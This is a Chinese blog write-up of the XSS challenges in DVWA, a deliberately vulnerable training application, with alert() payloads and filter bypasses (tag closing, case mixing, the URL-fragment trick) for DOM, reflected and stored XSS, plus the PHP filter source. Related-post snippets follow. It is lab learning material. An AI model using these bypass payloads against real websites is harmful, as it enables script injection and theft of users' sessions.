DVWA 三个等级的XSS

最新推荐文章于 2025-02-20 11:50:50 发布
最新推荐文章于 2025-02-20 11:50:50 发布
阅读量2.2k 收藏 7
点赞数 1
文章标签: dvwa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zzy2210/article/details/88676200
版权
这篇博客详细探讨了DVWA(Damn Vulnerable Web Application)中的XSS漏洞,包括DOM型XSS的LOW、MEDIUM、HIGH三个等级的攻击与防御方法。作者通过实验发现,LOW等级中script被过滤,而在HIGH等级中使用特定方法成功绕过过滤。同时,博客还分析了XSS (Reflected)和XSS (Stored)的情况,揭示了PHP过滤机制和正则表达式的应用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XSS(DOM)

LOW
这个难度极其简单,直接url注入一个scrip的命令 
?default=<script>alert('hacked')</script>

在这里插入图片描述

medium

首先,用low的情况加个大小写混写,看看情况。 

?default=<scrIPT>alert("hack")</SCRipt>

结果:
在这里插入图片描述结果直接把我的代码给去掉了,再猜一下别的代码。

?default=<img src=0 "alert('hacked')"/>

结果:
在这里插入图片描述看来,应该是将script过滤了,但是并未弹窗,让我看一下代码。

在这里插入图片描述可以看出,输入的命令被包含到了value中,那就把value闭合一下看看。

?default="><img src=0 "alert('hacked')"/>

仍未弹窗,看一下情况
在这里插入图片描述
这里只有开头字符被提取。看一下提取的方法:
在这里插入图片描述这里只看到了对option处理,但是不知道为什么单单闭合option标签仍会无效。
既然如此,便用干脆将整个select都闭合

?default="></option></select><img src=0 "alert('hacked')"/>

在这里插入图片描述成功。
那么来看看php代码

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}

?>

果然,是过滤了script

high
这个难度让我有点慌,先看一下php代码吧 
<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}

?>

。。。。。。本来已经放弃了,不过突然想到一个东西,让我试试

?default=English#<script>alert('hacked')</script>

在这里插入图片描述成功。

XSS (Reflected)

low
low级别,直接用script代码 
<script>alert('hacked')</script>

在这里插入图片描述EZ

medium
先是script看一下过滤。 
<scripT>alert(1)</scripT>

在这里插入图片描述…好吧,看来只是过滤了script直接大小写绕过
php代码:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>
high
惯例,先script代码看看过滤 
<scriPt>alert('hacked')</sCript>

在这里插入图片描述
果然,被过滤了。那么试一试img

<img src=1 "alert('hacked')">

在这里插入图片描述成功,那么php应该只是过滤了scrip标签。

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

果然,是用了正则表达式

XSS (Stored)

low
这个难度肯定是不设防,直接上 
<script>alert('hacked')</script>

成功:
在这里插入图片描述

medium

老样子,先试一试过滤
在这里插入图片描述结果: 在这里插入图片描述
看来是不区分大小写的过滤,那试试双写绕过?
在这里插入图片描述 在这里插入图片描述
好吧,看来不行啊。。。虽然想试试三写,不过先看一下name能不能搞一搞
在这里插入图片描述看上去限制了输入啊。。。让我抓包改一下

阴晦
关注
DVWA——XSS注入复现
m0_74825718的博客
12-12 788
找方法绕过服务器端的处理,直接在本地运行我们构造的语句,可以通过“#”来注释掉后面的内容,因为URL栏中的“#”之后的内容不会被发送到服务器当中去,不会经过JS的过滤,只在客户端显示,可以直接与浏览器进行交互。按照常理来说在low等级中没有对Name做任何限制是应该能够对其进行同样的XSS攻击的,查看别人的博客得知前端页面中返回给后端的Name的值是没有限制的,所以我们可以通过更改Name的maxlenth的值来对它进行XSS攻击实现。我们可以使用/来代替空格,通常可以用/**/,注释符号绕过;
DVWA平台存储型XSS实验
KUKULI233的博客
05-25 397
一、概念 长期存储于服务器端 每次访问都会执行js脚本 黑客将JS脚本发给服务器,服务器就会存在JS脚本,别的用户访问服务器时就会被脚本盗取cookie,黑客在旁监听 前几步相同,用户访问带有JS脚本的服务器时被重定向到第三方网站 二、使用场景 直接嵌入<script>alert(xss)</script> 元素事件<body onload=alert(xss)> <a href=http://192.168.>click</a> &l
DVWA全级别教程
10-26
DVWA全级别教程 通关秘籍 练手的同学可以下载 epub文件 适合手机平板看
DVWA靶场中的XSS DOM型
m0_46315342的博客
07-10 891
在做XSS DOM型的时候,总是很不理解为什么网上的一些笔记博客要先闭合和标签,找了很久之后终于找到了一篇博客,说的还挺好的。 这里给一下博客地址:XSS DOM DVWA靶场中,low级别很容易,直接插入就好了。 medium级别的时候,无论怎么插入都是不会成功的。 这是因为后端代码把script这个标签进行了处理,stripos这个函数是用来检测default输入里面有没有<script这个标签,如果有的话就直接跳转到default=English这个页面,所以就必须换成其他的标签,。img/b
DVWA亲测XSS漏洞_dvwa xss
最新发布
小司机的奥拓
02-20 1225
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
DVWA-XSS(Reflected)Low/Medium/High低中高级别
热门推荐
wangyuxiang946的博客
03-25 1万+
DVWA XSS(Reflected)Low DVWA XSS(Reflected)Medium DVWA XSS(Reflected)High
DVWA--存储型XSS(初中高)
firecjh的博客
06-09 919
选择“View Source”查看源程序,发现服务器端对message框内容使用了htmlspecialchars() 函数进行转义,对name框使用str_replace()函数进行替换。选择“View Source”查看源程序,对message参数进行html转义外,还对name参数使用preg_replace()函数进行替换,不能使用常用的绕过方法。2)在界面出现弹框,弹框内容为本人姓名拼音。2)在界面出现弹框,弹框内容为本人姓名拼音。3) 刷新页面,查看是否再次出现弹框,比较与反射型XSS的区别。
DVWA--DOM型XSS(初中高)
firecjh的博客
06-09 491
2)在界面出现弹框,弹框内容为本人姓名拼音。(使用参数“#”进行截断,其后添加相应的注入命令,因为“#” 后的参数只在浏览器端显示,并不会传送到服务器端,也就不会被过滤。使用参数“#”进行截断,其后添加相应的注入命令,因为“#” 后的参数只在浏览器端显示,并不会传送到服务器端,也就不会被过滤。选择“View Source”查看源程序,发现对参数进行了判断,如果不是选项,则使用默认的参数“English”。使用> 进行参数闭合,再添加DOM标签参数进行XSS注入。
DVWA靶场XSS三种类型漏洞练习
c_programj的博客
05-14 2226
DVWA靶场XSS三种漏洞练习反射型XSS(非持久性)【low】【Medium】【High】【Impossible】存储型XSS(持久性)【Low】【Medium】【High】【Impossible】DOM型【Low】【Medium】【High】【Impossible】总结:XSS漏洞常见函数: 反射型XSS(非持久性) 反射型 【low】 后台码源: <?php header ("X-XSS-Protection: 0"); // Is there any input? if
DVWA通关--存储型XSSXSS (Stored)
箭雨镜屋
07-16 8580
LOW 通关步骤 源码分析 MEDIUM 通关步骤 源码分析 HIGH 通关步骤 源码分析 IMPOSSIBLE 源码分析 总结
关于XSS三种攻击方式的理解:反射性,存储型,基于DOM
Primer_j的博客
05-25 2586
关于XSS三种攻击方式的理解:反射性,存储型,基于DOM 首先脚本执行需要客户端浏览器进行解析,是js脚本就交个js环境解析,或者php交给php环境解析,只有在相应环境解析才能够运行起来,就好比你在中国说英语大家不太懂,但是去了英国说别人就懂一样,这是你跟环境之间约定好的规则。而语言之间一般用特有的字符进行标识,比如js的写法就是用把数据封装起来,这样客户端浏览器收到这样的数据后就知道去交给javascript的语言环境来解析。那么客户端浏览器什么时候做这件事呢,一般情况下只有在接收到服务器的数据的时候会
DVWA全级别中文渗透教程和渗透环境,最强大没有之一
11-26
dvwa分为几个安全等级,是一个非常棒的渗透环境,,只需要一个phpstudy,DVWA全级别中文渗透教程和渗透环境,最强大没有之一。初学web安全的可以来下载
DVWA】反射型XSS_全级别
weixin_45378289的博客
07-03 452
1.low级别 <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>'; } ?> 分
DVWAStored XSS(存储型XSS)
谢公子的博客
10-04 9872
目录 Low Medium High Impossible Low 源代码: &lt;?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] );...
存储型XSS(Stored)DVWA等级绕过方法
12-01 3969
dvwa_存储型XSS等级演示一、low级别绕过前端限制,修改输入长度二、Medium级别三、High级别四、dvwa_impossible分析 一、low级别 打开dvwa靶场,将等级设置为low,选中XSS(Stored) 这里有一个很明显的特征就是表单,遇到这种情况最好每个表单都输入内容,即XSS测试语句 先查看源码(View Source): <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message =
DVWA 通关XSS(Stored)
干铮的博客
08-01 776
存储型XSS 持久化跨站脚本,持久性体现在XSS代码不是在某个参数(变量)中,而是写进数据库文件等可以永久保存数据的介质中。 存储型XSS通常发生在留言板等地方,可以在留言板位置进行留言,将恶意代码写进数据库中。 Low 没有任何过滤,直接使用弹窗代码。 <script>alert(/xss/)</script> Medium 分析源代码,可以看到对$message参数做了很严格的过滤(进行html实体转义以及转义SQL语句中使用的特殊字符,杜绝了对$message
DVWA平台v1.8-反射型XSS(low级别)
andiao1218的博客
12-14 199
源代码 <?php if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){ $isempty = true; } else { echo '<pre>'; echo '你好' . $_GE...
DVWAXSS-----------------high+各级别总结
qq_43665434的博客
02-21 644
DVWAXSS-----------------high+各级别总结 1、Reflected 输入测试语句 查看网页源码: 尝试<script>alert(/xss/)</script>,以及其大小写混合、拼凑版本均不成功。 尝试其他标签绕过成功: <img src=1 onerror=alert(/xss/)> <svg onload=alert(/xss/)> 源码分析: preg_replace()函数正则匹配参数中的<script并替换
DvwaXSS(DOM)全级别学习 笔记
Mbys_Lettuce的博客
09-22 375
因为url中#,&之后的内容,不会被提交到服务器,可以直接与浏览器进行交互,所以使用English#攻击一下。所以可能将有关的所有参数都过滤了,但我们还有其他的标签进行攻击,比如使用、等,尝试使用一下就很离谱,没有思路,看一下源码吧。本文为学习笔记,仅供学习!
搭建DVWA靶场体验XSS攻击平台使用
安全级别会影响DVWA中各个漏洞的难度,通常有10个等级供选择。 2. **使用DVWA**: - 访问DVWA的地址,通过Web界面登录。 - 熟悉DVWA界面,了解不同模块的功能。 - 根据需要进行安全漏洞尝试,如对SQL注入进行攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值